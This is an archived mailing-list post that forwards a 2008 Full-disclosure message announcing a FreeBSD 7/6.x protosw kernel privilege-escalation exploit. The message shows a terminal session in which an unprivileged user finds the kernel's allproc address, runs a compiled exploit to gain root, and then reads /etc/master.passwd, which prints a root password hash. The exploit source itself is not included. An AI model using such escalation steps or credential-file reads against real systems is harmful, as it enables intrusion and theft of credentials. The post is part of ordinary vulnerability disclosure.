Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] Fwd: [Full-disclosure] FreeBSD 7/6x protosw kernel exploit



,    .

--This is a forwarded message
From: don bailey <don.bailey@xxxxxxxxx>
To: dailydave@xxxxxxxxxxxxxxxxxxxxx <dailydave@xxxxxxxxxxxxxxxxxxxxx>
Date: Friday, December 26, 2008, 11:28:32 AM
Subject: [Full-disclosure] FreeBSD 7/6x protosw kernel exploit

===8<==============Original message text===============
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> uname -rs
FreeBSD 7.0-RELEASE
> id
uid=1001(donb) gid=1001(donb) groups=1001(donb),0(wheel)
> grep ^root /etc/master.passwd
grep: /etc/master.passwd: Permission denied
> nm /boot/kernel/kernel | grep allproc
c0bf26b8 B allproc
c0bf2670 B allproc_lock
> cc -o x x.c
> ./x 0xc0bf26b8
euid=0
> id
uid=1001(donb) gid=1001(donb) euid=0(root) groups=1001(donb),0(wheel)
> grep ^root /etc/master.passwd
root:$1$fuS6o3Qy$iFlUEpD9Y3ph7rOzMU/br1:0:0::0:0:Charlie &:/root:/bin/csh
>

Happy holidays, all!

D
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)

iEYEARECAAYFAklUla4ACgkQttfe3HwtctN/fgCeJDmmpOK8bn1dnssxOkTZXdUg
idUAmwdyoMZnoEfnrR14TQlRDli9mv+j
=Pixh
-----END PGP SIGNATURE-----

===8<===========End of original message text===========


-- 
~/ZARAZA
http://securityvulns.com/



 




Copyright © Lexa Software, 1996-2009.